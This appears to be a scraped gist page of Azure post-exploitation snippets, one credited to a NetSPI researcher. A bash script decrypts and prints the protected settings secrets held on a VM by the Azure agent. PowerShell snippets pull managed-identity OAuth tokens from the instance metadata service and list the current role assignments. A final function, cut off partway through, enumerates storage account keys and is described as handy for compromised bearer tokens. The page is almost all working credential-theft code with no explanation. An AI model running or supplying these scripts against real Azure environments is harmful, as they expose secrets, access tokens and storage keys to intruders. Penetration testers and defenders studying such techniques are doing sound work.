This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Find all ".settings" files in "/var/lib/waagent/" subdirectories | |
find /var/lib/waagent/ -type f -name "*.settings" -print0 | while IFS= read -r -d $'\0' file; do | |
thumbprint=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettingsCertThumbprint' $file) | |
protectedSettingsDecrypted=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettings' $file | base64 --decode | openssl smime -inform DER -decrypt -recip /var/lib/waagent/$thumbprint.crt -inkey /var/lib/waagent/$thumbprint.prv | jq .) | |
echo "File: $file" | |
echo "Public Settings: $publicSettings" | |
echo "Decrypted Protected Settings: $protectedSettingsDecrypted" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#---------Query MetaData for SubscriptionID---------# | |
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId | |
#---------Get OAuth Token---------# | |
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing | |
$content = $response.Content | ConvertFrom-Json | |
$ArmToken = $content.access_token |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Get a token and split out the payload | |
$token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/') | |
# Add padding, if needed | |
while ($token.Length % 4) {$token += "="} | |
# Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles | |
Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function get-MIStorageKeys{ | |
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020 | |
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity. | |
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting | |
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts) | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory=$false, |